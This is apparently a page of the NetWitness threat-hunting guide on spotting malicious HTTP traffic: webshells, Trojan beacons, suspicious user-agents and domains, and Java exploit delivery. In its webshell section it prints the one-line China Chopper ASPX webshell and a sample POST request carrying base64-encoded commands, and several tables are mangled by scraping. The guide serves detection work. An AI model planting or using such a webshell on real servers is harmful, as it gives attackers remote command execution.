NetWitness Hunting Guide - Page 3
NetWitness Hunting Guide - Continued
Protocol Analysis: HTTP
The Hypertext Transfer Protocol is one of the most widely used protocols on the Internet. Even most SSL/TLS transmission merely tunnel HTTP. Within any given dataset there will be an enormous amount of HTTP sessions to analyze. The parsers and application rules in Live Content focus on the behavior and technical aspects of the protocol. By studying how HTTP communicates as well as analyzing malware generated HTTP traffic and user generated HTTP traffic an analyst will become able to quickly determine what is out of place in a dataset vs. what seems to be normal. This is a common strategy amongst malware authors, they want to blend in with regular network communications and appear as innocuous as possible. But by their very nature Trojans are programmatic and structured and when examined it becomes clear the communications hold no business value.
Be aware that there are many harmless, custom-built applications that can resemble malware (stock ticker, weather, etc.) that beacon for updates every X seconds/minutes. They often have “faked” HTTP headers, in order to pass through network inspection devices (IDS/IPS) without alerting or blocking.
HTTP Structure
HTTP has many different versions still in common use including 0.9, 1.0, 1.1, SPDY and the draft 2.0 proposal. Excluding SPDY and HTTP/2.0 the header request/response structure remains basically the same. The client begins with the Request Method such as GET, POST or PUT; then a path and/or filename (with or without arguments if it is a web application), the HTTP version and the first carriage return and line feed which are 0x0D 0x0A in hexadecimal. Various HTTP headers follow but the header name is punctuated by a colon character (“:”), none to two spaces (0x20) then a value and finally another carriage return and line feed and the next header. The HTTP daemon knows the header section is finished when it parses out the double carriage return and line feed that indicate the next bytes are the body, if in fact there is a body at all. If there is a body, then a Content-Length header must be present and correct.
Figure 2. HTTP GET Structure outlines the basic structure of a HTTP GET Request and Response while Figure 3. HTTP POST Structure outlines the basic structure of a HTTP POST Request and Response.


Figure 3. HTTP POST Structure
HTTP Methods
A Method, in the context of HTTP, is a verb. By definition, HTTP supports 9 Methods, with WebDav (Web Distributed Authoring and Versioning) adding an additional 7 Methods. The most common Method in use is GET, which is roughly ten times as common as the POST Method. This is an important observation we will utilize later. For an analyst to understand what they are looking at in NetWitness, the HTTP Methods must be understood as well as the RFC compliant structure of HTTP. The table below describes the common HTTP Methods.
- Method:
GET
- Description:
Retrieve specified resource
- Method:
POST
- Description:
Send a resource to the server in the body of the POST
- Method:
PUT
- Description:
Store a resource on the server, such as a file
- Method:
HEAD
- Description:
Retrieve specified resource but omit the body
- Method:
DELETE
- Description:
Delete a resource on the server
- Method:
TRACE
- Description:
Echoes the request back to the sender for proxy/MitM detection
- Method:
OPTIONS
- Description:
Request the server to indicate the supported Methods
- Method:
CONNECT
- Description:
Tunnel another protocol via HTTP
- Method:
PATCH
- Description:
Apply a partial modification to the specified resource
HTTP/1.1 introduced a feature known as pipelining. Earlier versions of HTTP would start a new TCP session for every resource requested from the server. With modern web applications, this could have kicked off hundreds if not thousands of TCP sessions per page view. Pipelining allows the same TCP session to be reused for as long as the connection is maintained. This is why within HTTP/1.1 sessions an analyst can see GET and POST Methods in a single session and also potentially multiple files and forensics fingerprints. Most malware authors prefer a quick beacon and check in with their C2 infrastructure rather than having a constant connection that is always alive. The individual HTTP headers, which comprise the entire HTTP Header block, have a total service level limit of 4-8 KB per Request, which is generally not enough data for effective bidirectional communications. This is the behavioral aspect of malware we are looking for. To send data via HTTP many Trojans utilize the HTTP POST method and do not bother with handling pipelined requests. With this in mind, the rules below help filter out the interactive type of HTTP sessions from the mechanical ones.
Note: the following metadata are now in the HTTP Lua parser. These keys are not populated until the advanced feature is enabled on the HTTP_lua_options file by changing the return value from "false" to "true." For details, see the HTTP Lua Parser Options topic.
- Service Characteristics Metadata:
http post no get
- Description:
Sessions with only HTTP POST Methods
- Service Characteristics Metadata:
http get no post
- Description:
Sessions with only HTTP GET Methods
- Service Characteristics Metadata:
http post and get
- Description:
Sessions with HTTP GET and POST Methods
- Service Characteristics Metadata:
http connect
- Description:
Sessions with only HTTP CONNECT Methods
- Service Characteristics Metadata:
post no get no referer
- Description:
A POST only session with no referrer
- Service Characteristics Metadata:
post no get no referrer directotoip
- Description:
A POST only session with no referrer direct to an IP address, not a domain name
Webshells are defined as executable code on a web server that allows attackers to remotely execute commands. They can be executable files placed in a directory within the configured webroot and can be any language that the HTTP daemon is configured to execute. They can even be a legitimate scripts installed as part of a web application that has vulnerabilities that allow an attacker to execute system commands. RSA has observed Trojanized DLLs that replace system DLLs to accomplish webshell functionality as well as modified scripts that are part of a legitimate web application. Webshells can be configured to use any of the HTTP Methods to execute commands and the commands themselves can be in HTTP headers, URL or body of a POST Method among others. Webshells can range in size from a single line to thousands of lines of code. They are difficult to detect when not in use and are found at nearly every incident RSA has worked in the past 2 years.
Many popular webshells utilize the HTTP POST Method to send code to a stub that executes the code in the body of the POST. One example of this is the China Chopper webshell. The data to be evaluated by the script is in the body of the request. Signature based detection in this cases is either extremely hard or too loose and prone to a high number of false positives, the payload can change with each command and anything that is fixed is normally common in a lot of other cases. The connections in these cases are not kept alive and are torn down when a new command is issued. Searching for direction = inbound and analysis.service = http post no get would be a good start at detecting this type of behavior, if unencrypted. Below is an example of such a request.
- Column 1:
POST /ftpadmin.aspx HTTP/1.1
Cache-Control: no-cache
X-Forwarded-For: 248.192.237.178
Referer: http://ftp.example.com
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: ftp.example.com
Content-Length: 1091
Connection: Closecookie=Response.Write("->|");var err:Exception;try{eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String("ßSNIPàk7")),"unsafe");}catch(err){Response.Write("ERROR:// "%2Berr.message);}Response.Write("|<-");Response.End();&z1=Y21k&z2=Y2QgL2QgIkM6XGluZXRwdWJcd3d3cm9vdFwiJndob2FtaSAv
YWxsJmVjaG8gW1NdJmNkJmVjaG8gW0Vd
Figure 4. China Chopper Webshell Network Traffic Utilizing the POST Method
- Column 1:
<%@ Page Language="Jscript"%><%eval(Request.Item["cookie"],"unsafe");%>
Figure 5. Contents of China Chopper Webshell ftpadmin.aspx
HTTP Headers
The http.lua parser is responsible for analyzing the HTTP service. It is configurable for more verbose parsing by modifying the http_lua_options.lua file. These options include:
- Manipulating the full URL
- Registering the X-Forwarded-For HTTP heade
- Parsing and registering the HTTP Referrer path
- Parsing the HTTP Header User-Agent into its own meta key
- Resolving HTTP Response Codes into friendly names
- Verbosely parsing HTTP headers and their unique values
- Fingerprinting browsers based on HTTP Header order.
,>Figure 6. MSU Trojan Beacon,>, , , , , , , ,>Figure 7. MSU_rat Lua parser to detect MSU Variant,> ,>If the MSU_rat Lua parser did not exist, you could quickly write an application rule and push it out enterprise wide within minutes instead of the hours or days it would take to write a full detection parser and test it for efficacy. In this particular case, there were several variants of this Trojan in the environment, all beaconing to different domains. Having the HTTP protocol analyzed to this granularity allowed the analysts to quickly turn around and detect the additional Trojans in a trivial amount of time.> ,>This represents an example of creating an indicator of compromise based purely on existing metadata. This is not the equivalent of a signature in the traditional IDS/IPS sense, and still requires an analyst to review the data to determine if the traffic is legitimate or illegitimate. With all the traffic available, the analyst was then able to reconstruct the actions conducted by the actor. This is a key differentiator between NetWitness and common IDS/IDP, and is not possible with the latter, as they only work forward from the point in time when ‘signatures’ are applied to the device and then match on the pattern.>User-Agent,>HTTP Trojans try to blend in with normal HTTP traffic by emulating what they think is ‘normal’. A User-Agent is an application identifier for active web applications. They will generally tell you the Operating System and installed extensions for that browser, in the case of Internet Explorer. Trojans are either hard-coded with a User-Agent, or read the User-Agent from the Windows Registry. A popular User-Agent used by malware is displayed below.,>, , ,>Figure 8. User-Agent Example,> ,>This User-Agent shows that the Operating System is Windows XP 32 bit with Internet Explorer 6.0 running Service Pack 2 with Security Center Version 1. This Service Pack was released in 2004. It is highly unlikely that an actual user is browsing with a 12 year old Operating System and browser. Applications that generate web requests with this User-Agent are very probably not human driven and represent some sort of automated request. The http.lua parser can be configured to register meta in a key of your choice, by default it will register meta to the client key. The logic below is applied in order to categorize User-Agents. This type of logic is present throughout the Live Content in an attempt to segment the interesting traffic by protocol and behavioral artifacts.,>Service Characteristics MetadataDescription, , , , , , , , , , , , , , , , , , , , , , , 4.0 or 5.0, , , , , , , , , , , , , , , , , ,>Hostname Alias,>DNS and domain names are often called the backbone of the internet. They resolve friendly names like rsa.com to IP addresses that are understood by the layer 3 routing infrastructure. They are also used for malicious purposes, such as pointing a Trojan at C2, port calculation, and signaling an action. When using the metadata already discussed to organize your dataset into manageable buckets of behavior, the analyst should generally turn to the
alias.host report in NetWitness to begin triaging behavior.> ,>Analysts should look for misspelled names like ‘go0gle.com’ as well as nonsense domains like ‘jhkhajdsfgasdkfhk.info’ as well as seemingly innocuous names like ‘australiantestnew233s.info’. We recommend that you extract these domains, then run them through online tools like
Virustotal,
Robtex or
Bulk SEO Tools, and look for recent registration dates or obviously fake registrant information. With that in mind, Live content has logic built in to identify suspicious domains and allow the analyst to carve through the dataset by reducing the amount of data they are analyzing at a given time.>Service Characteristics MetadataDescription, , , apple, and so on, but do not end with .google.com or .apple.com, , , , or two groups of four consecutive consonants or numerals, useful for discovering a DGA (domain generation algorithm)., , , , , , , , , , , , e.g. host: 10.0.0.1, , , , org or net, ,>The Java Virtual Machine [JVM],>The Java Virtual Machine, or JVM, has been the target of considerable vulnerability research and remains a favorite vector for delivering malware. Even with the improvements in security that Oracle has been building into the latest versions, many organizations are stuck with years-old implementations because of unsupported applications the business still relies on. This allows cyber criminals an avenue of approach that is rarely locked down.> ,>For our purposes, we’ll analyze the behavior of three main components involved in exploit and malware delivery. We are interested in the JAR (Java ARchive), the Java Class and the Java Applet. An applet is usually a small script that runs in the context of the browser. Exploit Applets generally reference a JAR or Class file using specific launch properties, such as a decoding key or another special parameter set by the applet. Two examples are operating system and Java version; these are typically used to profile and deliver the proper exploit. This is where the JVM takes over to retrieve these Class or JAR files and launch them with the parameters specified by the applet. An interesting artifact of the JVM is that by default, its User-Agent is the version of Java completing the request.>, , gzip, , , , image/gif, image/jpeg, *; q=.2, */*; q=.2, , ,>Figure 9. Example JVM Request for Exploit JAR,> ,>Armed with this indicator we can construct a few rules to help narrow down only the JVM activity reaching the internet for a period of time. The following table highlights metadata that is relevant to the JVM.,>, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,> ,>All JVM and GET Method requests to the Internet should be analyzed. Many times, the malware being delivered isn’t encoded and the request after the JAR or Class file will be an executable. You can find this metadata in Forensic Fingerprint. The RSA Research team finds that opening up alias.host and tld allows us to quickly scan the domains involved to look for ones that are out of the ordinary. Not all payloads from JVM exploits come down in the clear. The exploit JAR could have code within it to unpack the payload after downloading it from the server. If these sessions are encoded with anything but a single byte XOR key, the forensic fingerprint parsers will not detect the executable—it will simply be a ‘blob’ of binary data. This is a key indicator for analyzing Java traffic; if you cannot identify the payload after a small JAR or Class file comes down, it might be time to dig deeper into the JAR or simply examine the payload for encoding schemes.> ,>In the example below, an exploit payload was delivered with a simple XOR encoding scheme. The JAR used a DWORD XOR key for the entire payload and was therefore not natively identified by NetWitness. A parser, in theory, could be used to detect these. However, as you add to the key length> ,>
,>Figure 10. Encoded Payload,>
,>Figure 11. Decoded Payload,> ,>It is not always as easy as this example to extract the payload. Often the JAR’s individual Class files have to be de-compiled and examined, possibly debugged and modified to discover the encoding or encryption algorithm used. Malware writers have even used a nonce exchange to generate a one-time key which is used to encode and deliver then decode and execute the malware. This is yet another reason full packet capture is a must for any serious analyst or researcher.,>Other HTTP Indicators,>There are a myriad of indicators, behavior and technical aspects of HTTP that can be combined to find malicious software. The Live content parsers put together some of the most common indicators of compromise [IOC] in an intelligent fashion for the analyst automatically. This is not the definitive list IOC’s to be used for hunting in the HTTP dataset, but offer a starting point for an investigation.,> ,>The
http with base64 and
http with binary logic deserves special mention. This is a common technique to obfuscate data being sent back to a C2 in order to appear more like normal HTTP traffic. Base64 data can be quickly decoded to discover what is inside: oftentimes binary data. If the data contained within these sessions does not decode properly, it could be because of a custom base64 alphabet, which will be present and defined within the Trojan. Similarly, the binary data, unless it is a simple single- or multi-byte XOR>Service Characteristics MetadataDescription, , , , , , , , , , , JARs, etc, , , , .php, .zip, etc, , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , not a hostname, that queries for a single character PHP script, ,> ,>
,>Figure 12. HTTP with Base64 Encoded Data in Body,>
,>Figure 13. HTTP with Binary Data in Payload,>Putting it All Together and Hunting in HTTP,>
,>Figure 14. NetWitness Hunting Theory,>Time Period,>The first step to hunting in NetWitness is possibly the most important step. Before we start drilling though the different meta categories, an analyst must first answer a question: "What time period am I looking at?" The analyst must also be aware that unlike most traditional forensics tools, NetWitness is always capturing data, and delivers results in near real-time. If we were to choose the default value of last 24 hours and happened to refresh our browser, the time offsets for that last 24 hours would change. For example>Directionality,>The next concept is directionality. What type of threats are we looking for and which direction would we look for these connections? If we are looking for Trojan C2 communications, we assume they are inside the network and connecting to an external resource; so we choose the direction
outbound. If we are looking for webshell activity and have properly set up our
traffic_flow_options.lua, we choose the direction
inbound. Lastly, if we are looking for some sort of internal relay to defeat firewall policy or access from a compromised DMZ machine, we choose the direction
lateral.>Choose a Service,>Now that we have selected an absolute time offset and chosen our direction, we can choose the service to be analyzed, in this case HTTP or service = 80. We have now narrowed down our dataset to just the pertinent data and can begin our actual analysis.,> ,>
BACK
NEXT,